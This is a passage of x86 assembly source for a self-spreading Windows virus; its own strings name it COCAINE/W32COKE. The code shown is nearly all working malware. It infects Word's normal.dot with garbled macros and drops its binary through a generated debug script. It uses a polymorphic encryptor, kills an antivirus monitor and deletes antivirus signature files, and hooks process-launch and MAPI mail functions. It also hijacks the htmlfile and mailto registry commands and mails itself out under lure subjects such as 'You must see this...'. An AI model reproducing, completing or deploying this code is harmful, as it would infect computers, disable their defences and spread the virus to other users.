eax mov edi, eax mov esi, [ebp+(ofs mm_on_off-ofs vcode)] @@14: lodsb cmp al, '%' jne @@18 lodsb sub al, '0' push ebx push esi movzx ecx, al mov esi, ebx @@15: lodsb test al, al jnz @@15 loop @@15 @@16: lodsb test al, al jz @@17 stosb jmp @@16 @@17: pop esi pop ebx mov al, 12h org $-1 @@18: stosb lea eax, [ebx-4] cmp esi, eax jb @@14 push 00004000h+00008000h push 0 push dwo [ebp+(ofs mm_on_off-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] ;free mem macro code (unprocess) mov ecx, edi pop esi sub ecx, esi push ecx mov [ebp+(ofs mm_on_off-ofs vcode)], esi push 00000040h push 00002000h+00001000h+00100000h push 150*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text sub ecx, ecx sub ebx, ebx mov edi, eax xchg eax, [esp] xchg eax, ecx add ecx, [ebp+(ofs mm_on_off-ofs vcode)];ecx=limit of macro template mov by [ebp+(ofs mdeep-ofs vcode)], -1 @@19: mov esi, [ebp+(ofs mm_on_off-ofs vcode)] inc ah cmp ah, 2 jne @@20 mov by [ebp+(ofs mdeep-ofs vcode)], 0 @@20: cmp ah, 8 jne @@21 mov by [ebp+(ofs mdeep-ofs vcode)], -1 @@21: cmp ah, 6 jne @@22 mov esi, [ebp+(ofs dbgscript-ofs vcode)] push ecx mov ecx, [ebp+(ofs dbgscript_size-ofs vcode)] rep movsb pop ecx call MacroGarble jmp @@19 @@22: cmp ah, 9 je @@28 @@23: cmp esi, ecx jb @@24 ;all buffer scanned? test ebx, ebx jz @@19 ;nothing we was searching exists mov esi, [ebp+(ofs mm_on_off-ofs vcode)];it exists, but we skipped! sub ebx, ebx @@24: lodsb cmp al, ah jne @@27 ;find line we're searching inc ebx ;flag found push eax mov ax, 100 call random cmp eax, 33 ;1/3 pop eax jnb @@27 ;skip this time mov by [esi-1], 9 ;flag as done @@25: lodsb test al, al jz @@26 stosb cmp al, 10 jne @@25 call MacroGarble ;after CRLF, insert garbage jmp @@25 @@26: jmp @@23 @@27: lodsb test al, al jnz @@27 ;seek till next line jmp @@23 @@28: push 00004000h+00008000h push 0 push dwo [ebp+(ofs mm_on_off-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from macro code mov eax, [esp] ;get buffer from stack push eax sub edi, eax push edi lea eax, [ebp+(ofs cokefile-ofs vcode)] push eax mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h call WriteDump ;create/write new normal.dot pop eax ;buffer push 00004000h+00008000h push 0 push eax call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from complete code push 00004000h+00008000h push 0 push dwo [ebp+(ofs dbgscript-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from debug script @@0: sub ecx, ecx pop dwo fs:[ecx] pop ecx sub eax, eax mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax add al, '0' mov by [ebp+(ofs dmt1-ofs vcode)], al mov by [ebp+(ofs dmt2-ofs vcode)+7], al mov by [ebp+(ofs outcmd-ofs vcode)+7], al mov by [ebp+(ofs ssize-ofs vcode)+7], al mov by [ebp+(ofs coda-ofs vcode)+7], al mov by [ebp+(ofs dmt3-ofs vcode)+7], al mov by [ebp+(ofs dmt4-ofs vcode)+7], al mov by [ebp+(ofs dmt5-ofs vcode)+7], al ret MacroSpread endp MacroGarble proc push eax push ecx push esi cmp by [ebp+(ofs mdeep-ofs vcode)], MAX_M_DEEP jae @@0 inc by [ebp+(ofs mdeep-ofs vcode)] mov eax, 4 call random add eax, 2 mov ecx, eax @@1: push ecx @@2: mov eax, 16 call random cmp al, 10 je @@remark cmp al, 11 je @@for cmp al, 12 je @@variables cmp al, 13 je @@if cmp al, 14 je @@10 jmp @@2 @@if: mov eax, ' fI' stosd dec edi call MakeVar mov eax, ' = ' call random_f jc @@3 dec ah call random_f jc @@3 inc ah inc ah @@3: stosd dec edi call MakeVar mov eax, 'ehT ' stosd mov eax, 000a0d00h+'n' stosd dec edi call MacroGarble call @@4 db 'End If', 13, 10 @@4: pop esi movsd movsd jmp @@10 @@remark: call random_f jc @@5 mov al, "'" stosb jmp @@6 @@5: mov eax, ' meR' stosd @@6: call MakeVar call MakeVar @@7: mov ax, 0a0dh stosw jmp @@10 @@variables: call MakeVar call random_f jc @@string mov eax, ' = ' stosd dec edi call MakeNumber @@8: jmp @@7 @@string: call MakeVar mov eax, ' = $' stosd mov al, '"' stosb call MakeVar mov al, '"' stosb jmp @@8 @@for: mov eax, ' roF' stosd push edi call MakeVar mov eax, ' = ' stosd dec edi call MakeNumber mov eax, ' oT ' stosd call MakeNumber mov ax, 0a0dh stosw call MacroGarble mov eax, 'txeN' stosd mov al, ' ' stosb pop esi @@9: lodsb cmp al, ' ' je @@8 stosb jmp @@9 @@10: pop ecx dec ecx jnz @@1 dec by [ebp+(ofs mdeep-ofs vcode)] @@0: pop esi pop ecx pop eax ret MacroGarble endp MakeNumber proc push ecx push eax mov eax, 2 call random inc eax mov ecx, eax @@1: mov eax, '9'-'0' call random add al, '0' stosb loop @@1 pop eax pop ecx ret MakeNumber endp include lz.inc include macro.inc update_address proc push eax ecx db 0b8h addr dd 0 ;get address to eax mov ecx, 4 @@1: rol ax, 4 call mhex ;print hex digits loop @@1 add dwo [ebp+(ofs addr-ofs vcode)], 10h ;update address pop ecx eax ret update_address endp mhex proc push eax ebx and eax, 01111b ;lower nibble call $+21 db '0123456789ABCDEF' pop ebx xlat ;turn it in hex digit stosb pop ebx eax ret mhex endp copy_line proc push eax @@0: lodsb or al, al jz @@1 ;zero found, stop copy stosb jmp @@0 @@1: pop eax ret copy_line endp make_hex proc push eax ecx esi db 0b8h+6 iaddr dd 0 ;esi<->actual buffer position inc dwo [ebp+(ofs iaddr-ofs vcode)] ;set next mov al, 20h stosb ;print space lodsb rol al, 4 call mhex ;print upper nibble rol al, 4 call mhex ;print lower nibble pop esi ecx eax loop make_hex ret make_hex endp script proc cld call debugmutator mov dwo [ebp+(ofs addr-ofs vcode)], 0100h mov [ebp+(ofs iaddr-ofs vcode)], esi ;set vars lea esi, [ebp+(ofs intro-ofs vcode)] call copy_line ;copy intro code mov eax, 16 cdq xchg eax, ecx div ecx ;ecx=number of 16-bytes lines mov ecx, eax ;edx=remainder for last line @@0: push ecx lea esi, [ebp+(ofs outcmd-ofs vcode)] call copy_line ;print call update_address ;address mov ecx, 16 call make_hex ;code to assemble mov eax, 000A0D00h+'"' stosd ;next line dec edi pop ecx loop @@0 mov ecx, edx jecxz @@1 ;no remainder? lea esi, [ebp+(ofs outcmd-ofs vcode)] call copy_line call update_address ;make last line call make_hex mov eax, 000A0D00h+'"' stosd dec edi sub wo [ebp+(ofs addr-ofs vcode)], 10h ;undo damage @@1: lea esi, [ebp+(ofs ssize-ofs vcode)] call copy_line ;rcx add wo [ebp+(ofs addr-ofs vcode)], dx sub wo [ebp+(ofs addr-ofs vcode)], 100h lea esi, [ebp+(ofs ssize-ofs vcode)] call copy_line ;optimization! sub edi, 6 call update_address ;set size mov eax, 000A0D00h+'"' stosd dec edi lea esi, [ebp+(ofs coda-ofs vcode)] ;copy final shit call copy_line ret script endp dbgscript dd 0 dbgscript_size dd 0 intro db 'Open "C:\COCAINE.SRC" For OutPut As ' dmt1 db '0', 13, 10 dmt2 db 'Print #0, "N C:\W32COKE.EX"',13,10,0 outcmd db 'Print #0, "E ',0 ssize db 'Print #0, "RCX"', 13, 10, 0 coda db 'Print #0, "W"', 13, 10 dmt3 db 'Print #0, "Q"', 13, 10 dmt4 db 'Print #0, ""', 13, 10 dmt5 db 'Close #0', 13, 10, 0 debugmutator proc pushad mov eax, 9 call random inc eax add by [ebp+(ofs dmt1-ofs vcode)], al add by [ebp+(ofs dmt2-ofs vcode)+7], al add by [ebp+(ofs outcmd-ofs vcode)+7], al add by [ebp+(ofs ssize-ofs vcode)+7], al add by [ebp+(ofs coda-ofs vcode)+7], al add by [ebp+(ofs dmt3-ofs vcode)+7], al add by [ebp+(ofs dmt4-ofs vcode)+7], al add by [ebp+(ofs dmt5-ofs vcode)+7], al popad ret debugmutator endp macro_end equ this byte MakeVar proc push ecx push eax mov eax, 5 call random add eax, 4 mov ecx, eax @@1: mov al, 'Z'-'A' call random add al, 'A' call random_f jc @@2 sub al, 'A'-'a' @@2: stosb push ecx push edi call @@3 db 'AaEeIiOoUu' @@3: pop edi mov ecx, 10 repne scasb jecxz @@4 dec dwo [esp-1] @@4: pop edi pop ecx loop @@1 stosb pop eax pop ecx ret MakeVar endp PatchIT proc push esi lea edi, [esi+ecx] ;destination mov ecx, 4 push eax mov esi, esp ;fake buffer in stack call WriteMem pop esi ;remove shit pop esi ret PatchIT endp _base dd 400000h NUM_TOPICS EQU 8 topics equ this byte dd ofs t0-ofs vcode dd ofs t0-ofs vcode dd ofs t0-ofs vcode dd ofs t1-ofs vcode dd ofs t2-ofs vcode dd ofs t3-ofs vcode dd ofs t4-ofs vcode dd ofs t5-ofs vcode t0 db '', 0 t1 db 'Kewl page!', 0 t2 db 'Improvement to your page', 0 t3 db 'Your page r0x0r!', 0 t4 db 'You must see this...', 0 t5 db 'Secret stuff!', 0 ;ESI=Code to encript (Big enought; Swappable) ;EDI=Place to put code (Big enought; Swappable) ;ECX=Size of code to encript ;EAX=Delta entrypoint ;EDX=VA where code will run in host ; ;EDI=Final buffer ;ECX=Size ;EAX=New delta entrypoint mutate proc cld push eax call crypt_poly ;decript engine mov [ebp+(ofs rva-ofs vcode)], edx call random0 mov [ebp+(ofs cp_key-ofs vcode)], al ;next memory key mov eax, [ebp+(ofs seed-ofs vcode)] mov [ebp+(ofs pseed-ofs vcode)], eax mov eax, 3 call random push 2 pop ebx add ebx, eax or bl, 1 pop eax @@1: push ebx call poly xchg esi, edi ;permute bufferz pop ebx dec ebx jnz @@1 ;next loop xchg esi, edi call crypt_poly ;encript poly engine after use ret mutate endp crypt_poly proc pushad mov al, by [ebp+(ofs cp_key-ofs vcode)] mov ecx, ofs egtable-ofs poly lea esi, [ebp+(ofs poly-ofs vcode)] @@1: xor by [esi], al inc esi loop @@1 popad ret crypt_poly endp rbuf db MAX_BRANCH*(128+4+4) dup (0) vinit proc mov esp, [esp+8] call delta lea eax, [ebp+(ofs seh-ofs vcode)] mov [esp-4], eax call init ;get api entries jc @@3 sub eax, eax mov ecx, MAX_SOCK+1 lea edi, [ebp+(ofs _socket-ofs vcode)] rep stosd mov [ebp+(ofs email_w-ofs vcode)], eax mov [ebp+(ofs mm_on_off-ofs vcode)], eax mov [ebp+(ofs mdeep-ofs vcode)], al lea eax, [ebp+(ofs kernel-ofs vcode)] push eax call [ebp+(ofs _GetModuleHandle-ofs vcode)] mov [ebp+(ofs K32-ofs vcode)], eax ;save kernel32 base lea esi, [ebp+(ofs k32_names-ofs vcode)] lea edi, [ebp+(ofs k32_address-ofs vcode)] @@1: lodsd or eax, eax jz @@2 add eax, ebp call gpa_kernel32 ;get all api we want from k32 jc @@3 stosd jmp @@1 db 0b9h @@2: lea eax, [ebp+(ofs user-ofs vcode)] push eax call [ebp+(ofs _LoadLibraryA-ofs vcode)] mov [ebp+(ofs U32-ofs vcode)], eax ;save user base @@4: lodsd or eax, eax jz @@5 mov ebx, [ebp+(ofs U32-ofs vcode)] add eax, ebp call gpa_custom ;get all api we want again jc @@3 stosd jmp @@4 db 0eah @@5: call @@adf db 'ADVAPI32',0 @@adf: call [ebp+(ofs _LoadLibraryA-ofs vcode)] call @@a11 db 'RegSetValueExA', 0 @@a11: push eax call @@aaa db 'RegCreateKeyExA', 0 @@aaa: push eax call @@baa db 'RegOpenKeyExA', 0 @@baa: push eax call @@caa db 'RegQueryValueExA', 0 @@caa: push eax call @@d db 'RegCloseKey', 0 @@d: push eax ;retrieve all needed APIs call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [ebp+(ofs _RegCloseKey-ofs vcode)], eax call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [ebp+(ofs _RegQueryValueEx-ofs vcode)], eax call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [ebp+(ofs _RegOpenKeyEx-ofs vcode)], eax call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [ebp+(ofs _RegCreateKeyEx-ofs vcode)], eax call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [ebp+(ofs _RegSetValueEx-ofs vcode)], eax lea eax, [ebp+(ofs wavp-ofs vcode)] sub ecx, ecx push eax push ecx call [ebp+(ofs _FindWindowA-ofs vcode)] or eax,eax jz @@b push ecx ;terminate AVPM using vg scheme push ecx push 16 push eax call [ebp+(ofs _PostMessageA-ofs vcode)] @@b: lea eax, [ebp+(ofs shitfile-ofs vcode)] push eax call DeleteShitFile call @@a1 db 'KERNEL.AVC', 0 @@a1: call DeleteShitFile call @@a2 db 'SIGN.DEF', 0 @@a2: call DeleteShitFile call @@a3 db 'FIND.DRV', 0 @@a3: call DeleteShitFile call @@a4 db 'NOD32.000', 0 @@a4: call DeleteShitFile call @@a5 db 'DSAVIO32.DLL', 0 @@a5: call DeleteShitFile call @@a6 db 'SCAN.DAT', 0 @@a6: call DeleteShitFile call @@a7 db 'VIRSCAN.DAT', 0 @@a7: call DeleteShitFile call @@a8 db 'C:\COCAINE.SRC', 0 @@a8: call DeleteShitFile lea ebx, [ebp+(ofs ancevsys-ofs vcode)] push 83h push ebx call [ebp+(ofs _SetFileAttributesA-ofs vcode)] lea esi, [ebp+(ofs current_time-ofs vcode)] push esi call [ebp+(ofs _GetSystemTime-ofs vcode)] lea edi, [ebp+(ofs seed-ofs vcode)] sub eax, eax lodsw lodsw ;init seed with dayofweek/day movsd push eax sub al, MONTH_DELAY ;enougth time passed? jnc @@6 add al, 12 @@6: cmp by [ebp+(ofs FunDate-ofs vcode)], al mov al, 90h je @@7 add al, 0c3h-90h ;nop/ret flip @@7: mov by [ebp+(ofs Payload-ofs vcode)], al pop eax add al, MONTH_DELAY aam 12 ;set trigger date mov by [ebp+(ofs FunDate-ofs vcode)], al call random0 mov [ebp+(ofs key1-ofs vcode)], eax call random0 mov [ebp+(ofs key2-ofs vcode)], eax call macro_crypt ;decript macro stuff call MacroSpread call random0 add by [ebp+(ofs macro_key-ofs vcode)], al call macro_crypt ;encript macro stuff lea edx, [ebp+(ofs directory-ofs vcode)] push edx push MAX_PATH call [ebp+(ofs _GetCurrentDirectoryA-ofs vcode)] test eax, eax jz @@10 call ProcessDir @@10: IF DIRECT EQ TRUE lea edx, [ebp+(ofs directory-ofs vcode)] push MAX_PATH push edx call [ebp+(ofs _GetWindowsDirectoryA-ofs vcode)] test eax, eax jz @@11 call ProcessDir @@11: ; lea edx, [ebp+(ofs directory-ofs vcode)] ; push MAX_PATH ; push edx ; call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)] ; test eax, eax ; jz @@12 ; call ProcessDir ; @@12: ENDIF mov esi, [ebp+(ofs _base-ofs vcode)] @@a: lea eax, [ebp+(ofs NewWinExec-ofs vcode)] mov ecx, 0 ;hook per-process functionz OldWinExec equ dwo $-4 jecxz @@8 call PatchIT @@8: lea eax, [ebp+(ofs NewCreateProcessA-ofs vcode)] mov ecx, 0 OldCreateProcessA equ dwo $-4 jecxz @@9 call PatchIT @@9: lea eax, [ebp+(ofs NewMAPISendMail-ofs vcode)] mov ecx, 0 OldMAPISendMail equ dwo $-4 jecxz @@92 call PatchIT @@92: lea eax, [ebp+(ofs NewGetProcAddress-ofs vcode)] mov ecx, 0 OldGetProcAddress equ dwo $-4 jecxz @@93 call PatchIT @@93: call Payload @@3: call delta cmp by [ebp+(ofs RestoreChunkz-ofs vcode)], FALSE je @@aa mov edx, MAX_BRANCH lea esi, [ebp+(ofs rbuf-ofs vcode)] @@rc1: lodsd add eax, [ebp+(ofs _base-ofs vcode)] mov edi, eax lodsd mov ecx, eax pushad call WriteMem popad lea esi, [esi+ecx] dec edx jnz @@rc1 @@aa: mov eax, 365 call random cmp ax, 24 jne @sajsj call GetList lea eax, [ebp+(ofs directory-ofs vcode)] push eax call DeleteShitFile @sajsj: call OpenAncev jc @@jdjd lea eax, [ebp+(ofs cokefile-ofs vcode)] push eax call DeleteShitFile @@jdjd: mov eax, NUM_TOPICS call random mov eax, [ebp+(ofs topics-ofs vcode)+(eax*4)] add eax, ebp mov [ebp+(ofs subject-ofs vcode)], eax IF DIRECT EQ TRUE inc dwo [ebp+(ofs what_key-ofs vcode)] call @@2323 db 'SOFTWARE\Classes\htmlfile\shell\open\command', 0 @@2323: pop eax call ConsultKey call FixKey sub eax, eax mov dwo [ebp+(ofs fsizel-ofs vcode)], eax mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax call Infect call @@2324 db 'SOFTWARE\Classes\mailto\shell\open\command', 0 @@2324: pop eax call ConsultKey call FixKey sub eax, eax mov dwo [ebp+(ofs fsizel-ofs vcode)], eax call Infect dec dwo [ebp+(ofs what_key-ofs vcode)] ENDIF sub eax, eax lea esi, [ebp+(ofs thread-ofs vcode)] push esi push eax push ebp lea esi, [ebp+(ofs MailThread-ofs vcode)] push esi push eax push eax call [ebp+(ofs _CreateThread-ofs vcode)] call http_install ret2host: pop dwo fs:[0] ;restore seh frame pop eax jmp host ;jmp to host vinit endp host_entry equ dwo $-4 seh: mov esp, [esp+8] jmp ret2host FixKey proc push -2 pop ecx mov edi, esi @@0: lodsb cmp al, '"' je @@1 test al, al jz @@2 cmp al, ' ' jne @@3 cmp ecx, -2 je @@2 @@3: stosb jmp @@0 @@1: inc ecx jecxz @@2 jmp @@0 @@2: sub eax, eax stosb ret FixKey endp cokefile db 'C:\COCAINE.SYS', 0 init proc mov ecx, esp call @@3 mov esp, [esp+8] ;fix stack @@1: call delta stc ;signal error mov cl, ? org $-1 @@2: clc ;signal sucess pop dwo fs:[0] ;restore seh frame sahf add esp, 4 lahf ret db 081h @@3: sub eax, eax push dwo fs:[eax] mov fs:[eax], esp ;set new seh frame mov eax, 0 ;is GetModuleHandleA imported? OldGetModuleHandleA equ dwo $-4 test eax, eax jz @@5 add eax, [ebp+(ofs _base-ofs vcode)] lea edx, [ebp+(ofs kernel-ofs vcode)] push edx call [eax] ;use imported API to get test eax, eax ;kernel32 module jz @@5 mov edx, eax jmp @@4 @@5: mov eax, 077f00000h ;wNT base push eax call check_base pop edx jz @@4 mov eax, 077e00000h ;wNT 5 base push eax call check_base pop edx jz @@4 mov eax, 0bff70000h ;w9x base push eax call check_base pop edx jnz @@1 @@4: mov eax, edx mov ebx, eax call delta add eax, [eax+3ch] cmp dwo [eax], 'EP' jne @@1 add ebx, [eax+120] ;export table lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)] mov dwo [ebp+(ofs size_search-ofs vcode)], 17 mov [ebp+(ofs string_search-ofs vcode)], eax call search_et ;get GetModuleHandle jc @@1 mov [ebp+(ofs _GetModuleHandle-ofs vcode)], eax lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)] mov dwo [ebp+(ofs size_search-ofs vcode)], 15 mov [ebp+(ofs string_search-ofs vcode)], eax call search_et ;get GetProcAddress jc @@1 mov [ebp+(ofs _GetProcAddress-ofs vcode)], eax jmp @@2 init endp check_base proc call @@1 mov esp, [esp+8] call delta cmp eax, esp jmp @@0 @@1: push dwo fs:[0] mov fs:[0], esp cmp wo [eax], 'ZM' @@0: pop dwo fs:[0] pop eax ret check_base endp search_et proc mov eax, [ebx+32] add eax, edx ;name table ptr @@1: mov esi, [eax] or esi, esi jz @@3 ;nul ptr add esi, edx mov edi, 0 string_search equ dwo $-4 mov ecx, 0 size_search equ dwo $-4 rep cmpsb ;the one we search? jz @@2 add eax, 4 jmp @@1 ;check next api @@2: sub eax, [ebx+32] sub eax, edx shr eax, 1 ;div by 2 add eax, [ebx+36] add eax, edx movzx eax, wo [eax] shl eax, 2 ;mul by 4 add eax, [ebx+28] add eax, edx mov eax, [eax] add eax, edx clc ;signal sucess mov cl, 12h org $-1 @@3: stc ;signal error ret search_et endp gpa_custom proc push eax ;pointer to api wanted push ebx ;module handle jmp _gpa db 66h gpa_kernel32 proc push eax push dwo [ebp+(ofs K32-ofs vcode)] _gpa: call [ebp+(ofs _GetProcAddress-ofs vcode)] or eax, eax jz @@1 clc mov cl, 12h org $-1 @@1: stc ret gpa_kernel32 endp gpa_custom endp MAX_RECURSION = 3 JMP_MAX = 16 MAX_SUBROUTINES = 16 flg record{ _key:1, ;1key isnt necessary ;4 _encriptor:2 ;XOR = 00 ;NOT = 01 ;ADD = 10 ;SUB = 11 ;23 _bwd_fwd:1, ;0inc/1dec counter ;1 _direction:1, ;1backward/0forward ;0 } pushf db 09ah poly proc ;encripted in memory! push esi mov [ebp+(ofs entry-ofs vcode)], eax mov [ebp+(ofs buffer-ofs vcode)], edi mov [ebp+(ofs _size-ofs vcode)], ecx ;save entry values sub eax, eax mov [ebp+(ofs reg32-ofs vcode)], eax mov [ebp+(ofs recurse-ofs vcode)], eax ;init internal vars mov [ebp+(ofs lparm-ofs vcode)], eax mov [ebp+(ofs lvars-ofs vcode)], eax mov [ebp+(ofs subs_index-ofs vcode)], eax mov [ebp+(ofs s_into-ofs vcode)], eax ;(dword) call random0 and eax, mask _bwd_fwd + mask _direction + mask _encriptor mov [ebp+(ofs flagz-ofs vcode)], eax ;set engine flagz mov edx, eax and edx, 11b call random0 mov [ebp+(ofs key-ofs vcode)], al ;choose key lea ebx, [ebp+(ofs crypt_table-ofs vcode)] test edx, 10b jz @@0 add ebx, 6 ;next table @@0: test edx, 01b jz @@1 add ebx, 3 ;second choice @@1: mov ax, wo [ebx] mov [ebp+(ofs _dec-ofs vcode)], ax mov al, by [ebx+2] mov [ebp+(ofs _enc-ofs vcode)], al dec edx jnz @@2 mov by [ebp+(ofs key-ofs vcode)], 0D0h ;not dont use key bts dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key) @@2: jmp @@3 ;flush piq @@3: lodsb _enc db 00 key db 00 stosb loop @@3 ;crypt code mov eax, 64 call random mov ecx, eax call _shit mov [ebp+(ofs decriptor-ofs vcode)], edi;here the decriptor start call garble ;start of decriptor lea ebx, [ebp+(ofs make_counter-ofs vcode)] lea edx, [ebp+(ofs make_pointer-ofs vcode)] call swapper ;setup start of poly decriptor push edi ;loop start here call garble mov eax, [ebp+(ofs _dec-ofs vcode)] mov edx, [ebp+(ofs p_reg-ofs vcode)] or ah, dl stosw ;store crypt instr bt dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key) jc @@4 mov al, by [ebp+(ofs key-ofs vcode)] stosb ;store key @@4: call garble lea ebx, [ebp+(ofs upd_counter-ofs vcode)] lea edx, [ebp+(ofs upd_pointer-ofs vcode)] call swapper ;update counter and pointer mov edx, [ebp+(ofs c_reg-ofs vcode)] call random jc @@5 call random js @@7 mov eax, 0c00bh ;or reg, reg jmp @@8 @@7: mov eax, 0c085h ;test reg, reg @@8: mov ecx, edx shl edx, 3 or ah, dl or ah, cl stosw jmp @@6 @@5: mov eax, 0f883h or ah, dl stosw ;cmp reg, 0 sub eax, eax stosb @@6: mov ax, 850fh ;do conditional jump stosw pop edx sub edx, edi ;delta distance sub edx, 4 mov eax, edx stosd ;jnz start_of_loop mov dwo [ebp+(ofs reg32-ofs vcode)], 0 call garble mov al, 0e9h stosb ;jmp start mov eax, edi sub eax, [ebp+(ofs buffer-ofs vcode)] sub eax, [ebp+(ofs entry-ofs vcode)] add eax, 4 neg eax stosd call garble call garble mov ecx, [ebp+(ofs buffer-ofs vcode)] ;(this allow the calls be sub edi, ecx ;forward/backward direction) xchg edi, ecx mov eax, [ebp+(ofs decriptor-ofs vcode)];calculate new entrypoint sub eax, [ebp+(ofs buffer-ofs vcode)] ;relative to previous rva pop esi ret poly endp gar proc call random0 ;get any reg and eax, 0111b cmp al, 4 ;esp never je gar ret gar endp get8free proc mov eax, [ebp+(ofs reg32-ofs vcode)] and eax, 01111b cmp eax, 01111b jne @@1 stc ret @@1: call random0 and eax, 011b bt [ebp+(ofs reg32-ofs vcode)], eax ;al,cl,dl,bl jc get8free call random_f jc @@2 or al, 0100b ;ah,ch,dh,bh @@2: ret get8free endp get32reg proc ;get a free 32bit reg call gar ;and mark it as used bts [ebp+(ofs reg32-ofs vcode)], eax jc get32reg ret get32reg endp get32free proc ;get a free 32bit reg call gar ;and NOT mark it as used bt [ebp+(ofs reg32-ofs vcode)], eax jc get32free ret get32free endp swapper proc call random0 jc @@1 xchg edx, ebx ;change order @@1: push edx call ebx ;call 1th call garble pop edx call edx ;call 2th call garble ret swapper endp make_counter proc call get32reg mov [ebp+(ofs c_reg-ofs vcode)], eax cmp al, 5 ;ebp complicate methodz jne @@2 btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp jmp make_counter @@2: or al, 0b8h stosb mov eax, [ebp+(ofs _size-ofs vcode)] test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd jnz @@1 neg eax ;counter will be INCed @@1: stosd ret make_counter endp make_pointer proc call get32reg cmp al, 5 ;ebp complicate methodz jne @@1 btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp jmp make_pointer @@1: mov [ebp+(ofs p_reg-ofs vcode)], eax or al, 0b8h stosb mov eax, [ebp+(ofs rva-ofs vcode)] test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction jz @@2 add eax, dwo [ebp+(ofs _size-ofs vcode)];pointer will be DECced dec eax @@2: stosd ret make_pointer endp upd_pointer: mov eax, [ebp+(ofs p_reg-ofs vcode)] test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction jmp _update_reg upd_counter: mov eax, [ebp+(ofs c_reg-ofs vcode)] test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd _update_reg proc ;z=inc/nz=dec mov ebx, 0140h ;inc mov edx, 0c083h ;add jz @@0 xor edx, 0c083h xor 0e883h ;sub mov bl, 48h ;dec @@0: push eax mov eax, 3 call random or eax, eax jz @@2 ;choose method dec eax jz @@1 xor edx, 0c083h xor 0e883h ;sub<->add neg bh ;neg(1) @@1: pop ecx mov eax, edx or ah, cl ;patch reg stosw movzx eax, bh ;signal jmp @@3 @@2: pop ecx xchg eax, ebx or al, cl ;patch reg @@3: stosb ret _update_reg endp garble proc pushad inc by [ebp+(ofs recurse-ofs vcode)] cmp by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION jae @@1 mov eax, 8 call random add eax, 4 mov ecx, eax ;4-11 instructionz @@0: push ecx lea esi, [ebp+(ofs gtable-ofs vcode)] mov eax, (ofs egtable - ofs gtable)/4 call random shl eax, 2 add esi, eax lodsd add eax, ebp cmp by [ebp+(ofs lgarble-ofs vcode)], al je @@2 ;same? mov by [ebp+(ofs lgarble-ofs vcode)], al call eax @@2: pop ecx loop @@0 @@1: dec by [ebp+(ofs recurse-ofs vcode)] mov [esp], edi ;copy of edi in stack popad ret garble endp make_subs proc cmp by [ebp+(ofs s_into-ofs vcode)], 0 jne @@1 cmp dwo [ebp+(ofs subs_index-ofs vcode)], MAX_SUBROUTINES ja @@1 inc by [ebp+(ofs s_into-ofs vcode)] ;mark into mov eax, [ebp+(ofs subs_index-ofs vcode)] inc dwo [ebp+(ofs subs_index-ofs vcode)] mov ecx, 6 cdq mul ecx lea esi, [ebp+eax+(ofs subs_table-ofs vcode)] mov al, 0e9h stosb stosd push edi ;[esp]-4 = skip_jmp call garble mov [esi], edi ;where sub is mov eax, 5 call random ;number of paramz pushed mov [esi.4], al ;by caller mov eax, 5 call random ;number of local variables mov [esi.5], al test eax, eax ;if not local variables, then jz @@0 ;dont alloc stack mov ebx, eax shl ebx, 2 ;displacement in dwords mov al, 0c8h stosb ;enter mov eax, ebx stosd ;size/deep dec edi jmp @@2 @@0: mov al, 55h stosb ;push ebp mov ax, 0ec8bh stosw ;mov ebp, esp @@2: push dwo [ebp+(ofs reg32-ofs vcode)] ;save reg state mov by [ebp+(ofs _pusha-ofs vcode)], 0 ;no use pusha at start mov eax, 3 call random test eax, eax je @@4 ;will use PUSHA! @@10: call random0 ;choose regs and eax, 11111111b or eax, 00110000b ;set EBP and ESP too cmp al, -1 jz @@10 mov [ebp+(ofs reg32-ofs vcode)], eax and eax, 11001111b not al ;free regs are set bits now! test eax, eax jz @@10 @@5: bsf edx, eax jz @@6 ;no more regs free? btc eax, edx ;clear it cmp dl, 4 je @@5 cmp dl, 5 ;ebp-esp dont need be saved je @@5 push eax mov eax, edx ;get position or al, 50h stosb ;store as PUSH pop eax jmp @@5 @@4: mov by [ebp+(ofs _pusha-ofs vcode)], -1 ;pusha used! mov dwo [ebp+(ofs reg32-ofs vcode)], 00110000b mov al, 60h ;set EBP and ESP as used stosb ;pusha @@6: movzx eax, by [esi.4] mov [ebp+(ofs lparm-ofs vcode)], eax movzx eax, by [esi.5] mov [ebp+(ofs lvars-ofs vcode)], eax ;set paramz to mem write/read call garble call garble call garble xor eax, eax mov [ebp+(ofs lparm-ofs vcode)], eax ;disable mem write/read mov [ebp+(ofs lvars-ofs vcode)], eax mov al, [ebp+(ofs _pusha-ofs vcode)] inc al jnz @@7 ;well, do individual POPs mov al, 61h stosb ;POPA jmp @@8 @@7: mov eax, [ebp+(ofs reg32-ofs vcode)] and eax, 11001111b not al ;free regs are set bits now! @@9: bsr edx, eax jz @@8 ;no more regs free? btc eax, edx ;clear it cmp dl, 4 je @@9 cmp dl, 5 ;ebp-esp dont need be restored je @@9 push eax mov eax, edx ;get position or al, 58h stosb ;store as POP this time pop eax jmp @@9 @@8: pop dwo [ebp+(ofs reg32-ofs vcode)] ;restore reg state @@3: mov al, 0c9h stosb ;leave mov al, 0c2h stosb ;ret movzx eax, by [esi.4] shl eax, 2 test eax, eax jz @@a stosw ;clean params jmp @@b @@a: mov by [edi-1], 